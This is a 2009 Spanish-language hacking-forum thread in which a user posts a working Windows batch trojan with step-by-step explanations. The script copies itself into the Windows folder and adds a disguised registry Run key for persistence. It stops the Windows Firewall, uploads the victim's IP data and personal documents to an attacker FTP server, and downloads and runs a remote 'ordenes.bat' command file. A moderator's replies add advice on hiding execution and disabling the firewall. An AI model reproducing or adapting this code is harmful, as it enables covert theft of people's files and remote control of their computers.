elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Mini Troyano por FTP [BATCH]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Mini Troyano por FTP [BATCH]  (Leído 7,381 veces)
CaronteGold


Desconectado Desconectado

Mensajes: 339



Ver Perfil
Mini Troyano por FTP [BATCH]
« en: 29 Agosto 2009, 05:57 am »

Código:
  Bueno creo este tema porque tengo unas cuantas dudas, estoy haciendo una especie de "troyano", por Batch.


  Y quiero saber como lo puedo meter al registro de Windows, para que cada vez que se inicie se re-active.

  También cómo poner un archivo llamado por ejemplo "órdenes" en el servidor y que lo abra y lo haga, como por ejemplo copiar un archivo del pc y mandarlo al servidor.

  Y una última cosa, igual suena raro, pero por si es posible, quisiera saber si es posible que el batch al ejecutarse lo haga de forma silenciosa y no se vea que sube los archivos y eso....

 El código:

[code] @echo off

set user=XXXX
set pass=XXXXX
set dominio=XXXXXXX


echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put info.txt>>datos.txt
echo bye>>datos.txt

ipconfig>>info.txt
ftp -s:datos.txt

del info.txt
del datos.txt

exit


  Como ven es simple, pero básicamente es la primera cosa un poco decente que hago de batch.

 Un saludo,

 Edito: en ese código, el ejemplo a subir fue la IP , y los datos que te da al poner "ipconfig" en el ms-dos.

  

 E D I TO :

  Aquí el código del Mini-Troyano .
Código:
@echo off
copy /y "%~dpnx0" "%windir%\"
reg add HKLM\software\microsoft\windows\currentversion\run /v "Actualización" /d C:\WINDOWS\Actualización.bat /f

cd \
net stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)"

set user=XXXXXX
set pass=XXXXXX
set dominio=XXXXXX

echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put %USERNAME%.txt>>datos.txt
echo put %homedrive%%homepath%\Mis Documentos\*.txt>>datos.txt
echo get ordenes.bat C:\WINDOWS\system32\ordenes.bat>>datos.txt
echo bye>>datos.txt


ipconfig>>%USERNAME%.txt
ftp -s:datos.txt
start C:\WINDOWS\system32\ordenes.bat



del %USERNAME%.txt
del datos.txt



pause>nul
exit




   Primero se copia a la carpeta de Windows ( por si es borrado ), y luego se añade al registro de Windows.

   Después por si tienen el Firewall de Windows y este detecta las conexiones FTP, pues lo desactiva. ( Obviamente con otro Firewall no funcionaría )

   Luego en donde las XXXX, ponemos los datos.

Código:
echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put %USERNAME%.txt>>datos.txt
echo get ordenes.bat C:\WINDOWS\system32\ordenes.bat>>datos.txt
echo bye>>datos.txt

  Ese trozo es la información que tendrá que hacerse en cuanto se abra el FTP, primero se conecta, luego subirá el archivo %USERNAME% que justo debajo sale, subirá la IP de la víctima. ( eso es un ejemplo si queréis podéis quitarlo ), y luego descargará el archivo ordenes.bat, que tendremos que poner en nuestro servidor FTP, para que se descargue.( este se ponrá en la carpeta de system32)


Código:
ipconfig>>%USERNAME%.txt
ftp -s:datos.txt
start C:\WINDOWS\system32\ordenes.bat

del %USERNAME%.txt
del datos.txt

pause>nul
exit

  Aquí creará el archivo %username% ( nombre del usuario ), con dentro la ip, esto lo tomé como ejemplo, como dije podéis borrarlo y usar solo las ordenes mediante el archivo ordenes.bat

  Luego ftp-s:datos.txt, es el archivo que leerá el sistema para entrar al ftp y relizar las ordenes.

 Luego en start ........ordenes.bat, lo que hace es abrir el archivo ordenes.bat y ahí pondremos lo que queramos, el nombre tiene que ser ordenes y extensión .bat, si no no funcionará pero podéis cambiarlo y que se descargue lo que sea. Y obviamente, tiene que ser en lenguaje BATCH. ( como dije, podéis subir lo que queráis, una foto, un .exe, pero tenéis que cambiar el código). El archivo ordenes se abrirá cada reinicio, así que tenéis que cambiarlo si queréis realizar otras acciones.

  Luego para no dejar pruebas evidentes, se borra el archivo username, y datos.


  Si algo no funciona o hay alguna duda, aquí estoy.

  Se me olvidaba, para que haga todo de manera silenciosa ( sin aparecer en pantalla ) tenéis que usar un compilador, como Quick Batch File Compiler. Y en opciones modo Ghost. Yo uso uno portable, raro el que se instalaba me detectaba como virus el avast... no se porqué... pero si cambiáis el nombre o algo a veces deja...


   Saludos.
[/code]


« Última modificación: 13 Octubre 2009, 23:29 pm por CaronteGold » En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Mini Troyano por FTP [BATCH]
« Respuesta #1 en: 29 Agosto 2009, 06:35 am »

Citar
Y quiero saber como lo puedo meter al registro de Windows, para que cada vez que se inicie se re-active.
Código
  1. C:\>REG ADD /?
http://foro.elhacker.net/tutoriales_documentacion/manual_de_procesos_que_se_ejecutan_al_inicio_de_windows_xp-t146876.0.html

Citar
También cómo poner un archivo llamado por ejemplo "órdenes" en el servidor y que lo abra y lo haga, como por ejemplo copiar un archivo del pc y mandarlo al servidor.

No me queda clara tu pregunta, ... que pueda recibir ordenes? supongo que con un bucle que registre el ftp cada cierto tiempo, baje y lea un archivo debería de ser suficiente.

Citar
Y una última cosa, igual suena raro, pero por si es posible, quisiera saber si es posible que el batch al ejecutarse lo haga de forma silenciosa y no se vea que sube los archivos y eso....
Debes de empaquetar (alguno dirá compilar) el archivo con algún programa como QBFC o similar, o ejecutarlo por medio de un vbscript
Te recomiendo , porque son cosas que se han preguntado muuuchas veces :rolleyes:

Saludos



En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
CaronteGold


Desconectado Desconectado

Mensajes: 339



Ver Perfil
Re: Mini Troyano por FTP [BATCH]
« Respuesta #2 en: 29 Agosto 2009, 06:45 am »

   Gracias por la rápida respuesta.


  Pues sobre lo de las órdenes, creo que es lo mismo que tu dices, pero no se hacerlo :-( , he subido un archivo llamado ordenes.txt , tenía unas cosas de prueba para que se metiesen dentro de info.txt y fuera subido,  como por ejemplo, mando copiar una carpeta y subirla por ftp, pues lo subí luego puse start ordenes.txt, ( fijo que está mal) , y me daba error, decía que no se encontraba el archivo, el caso es que tampoco especifiqué nada, solo puse start ordenes.txt.

 Luego lo del compilador, pues ese programa lo tengo, pero sirve para transformalos a exe y no ver su código no ¿?, igual lo que tu dices es lo que pregunto, pero por si no se entendió bien, lo que quiero es que al subir los archivos y todo, esté como tapado, no se vea nada de nada, porque si acaso hubiese que subir una carpeta pesada, el usuario lo cancelaría al ver que se está subiendo una cosa.

  Saludos y gracias.


 EDITO: Cuando probé el bat la primera vez me saltó el firewall de windows, dando opción a continuar el bloqueo o desbloquear eso también se puede quitar creo , ¿no?, desbloquearlo automático o directamente quitar el firewall por mientras.
« Última modificación: 29 Agosto 2009, 06:47 am por CaronteGold » En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Mini Troyano por FTP [BATCH]
« Respuesta #3 en: 29 Agosto 2009, 07:01 am »

Citar
he subido un archivo llamado ordenes.txt , tenía unas cosas de prueba para que se metiesen dentro de info.txt y fuera subido, como por ejemplo, mando copiar una carpeta y subirla por ftp, pues lo subí luego puse start ordenes.txt, ( fijo que está mal) , y me daba error, decía que no se encontraba el archivo, el caso es que tampoco especifiqué nada, solo puse start ordenes.txt.
:huh: ... donde pusiste el archivo ordenes.txt? en un servidor? o en tu pc?
Si esta en el servidor FTP es lógico que no lo puedas ejecutar, y de ser así te recomendaría leer algo básico en lo posible

Citar
Luego lo del compilador, pues ese programa lo tengo, pero sirve para transformalos a exe y no ver su código no ¿?, igual lo que tu dices es lo que pregunto, pero por si no se entendió bien, lo que quiero es que al subir los archivos y todo, esté como tapado, no se vea nada de nada, porque si acaso hubiese que subir una carpeta pesada, el usuario lo cancelaría al ver que se está subiendo una cosa.
Esos programas tienen la opción de pasar el batch a un exe, y que el exe se ejecute en modo oculto (hide)

Citar
EDITO: Cuando probé el bat la primera vez me saltó el firewall de windows, dando opción a continuar el bloqueo o desbloquear eso también se puede quitar creo , ¿no?, desbloquearlo automático o directamente quitar el firewall por mientras.
Por ej: http://foro.elhacker.net/hacking_basico/detener_el_firewall_de_windows_xp_sp2-t183228.0.html

Esto para el FW de win, de tener un "verdadero" firewall ya es casi imposible o por demás complicado

Repito .. estos temas se han preguntado muchas veces

Saludos
« Última modificación: 29 Agosto 2009, 07:03 am por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
CaronteGold


Desconectado Desconectado

Mensajes: 339



Ver Perfil
Re: Mini Troyano por FTP [BATCH]
« Respuesta #4 en: 29 Agosto 2009, 07:13 am »

Citar
Si esta en el servidor FTP es lógico que no lo puedas ejecutar, y de ser así te recomendaría leer algo básico en lo posible

 Está en el servidor FTP, y lo pregunto porque he visto en otro post de un foro que se podía hacer. Pero apenas explicaba algo.

EDITO: He probado a compilar lo que llevo hecho, y cuando lo compilo ya sea modo normal o Ghost ( de forma silenciosa ) me lo detecta el antivirus :S

  Me parece extraño, porque no debería.
« Última modificación: 29 Agosto 2009, 18:00 pm por CaronteGold » En línea

CaronteGold


Desconectado Desconectado

Mensajes: 339



Ver Perfil
Re: Mini Troyano por FTP [BATCH]
« Respuesta #5 en: 13 Septiembre 2009, 00:34 am »


  Bueno ya he terminado el "troyano" si se puede llamar así, ahora seguiré haciendo una especie de Controlador, o algo así, para memorizar funciones y que suba el bat "la orden" por ftp automático para que en cada reinicio la víctima lo descargue, y abra.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines